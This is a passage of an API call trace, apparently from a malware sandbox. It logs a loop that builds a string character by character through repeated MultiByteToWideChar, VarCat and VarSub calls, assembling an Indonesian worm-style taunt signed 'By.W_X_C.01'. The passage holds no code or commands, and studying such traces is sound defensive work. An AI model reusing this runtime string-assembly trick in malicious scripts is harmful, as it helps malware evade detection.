0x0 [0084.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.693] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.693] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.694] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.694] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0084.694] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.694] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.694] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.694] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="P", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0084.695] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.695] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.695] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.695] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0084.695] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.695] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="B", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0084.696] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.696] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0084.696] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.696] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.696] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.696] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.697] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.697] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.697] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.697] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0084.697] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.697] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.698] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.698] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.698] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.698] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.698] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.698] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0084.698] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.699] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0084.699] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.699] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.699] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.699] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0084.700] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.700] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="P", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0084.700] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.700] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.700] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.700] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0084.700] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.701] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.701] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.701] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0084.701] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.701] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.702] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.702] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0084.702] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.702] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.702] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.702] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.703] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.703] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.703] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.703] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.703] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.703] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0084.703] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.704] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.704] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.704] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0084.704] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.704] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.705] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.705] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0084.705] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.705] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.705] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.705] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.706] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.706] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0084.706] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.706] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.706] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.706] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.707] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.707] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.707] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.707] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0084.707] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.707] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.708] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.708] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="&", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="&") returned 1 [0084.708] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.708] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.709] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.709] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0084.709] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.709] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.709] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.709] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.710] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.710] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0084.710] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.710] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0084.710] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.710] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.710] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.710] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.711] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.711] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0084.711] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.711] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0084.711] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.711] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.711] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.712] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.712] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.712] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0084.712] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.712] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.712] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.712] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0xe3ef24, 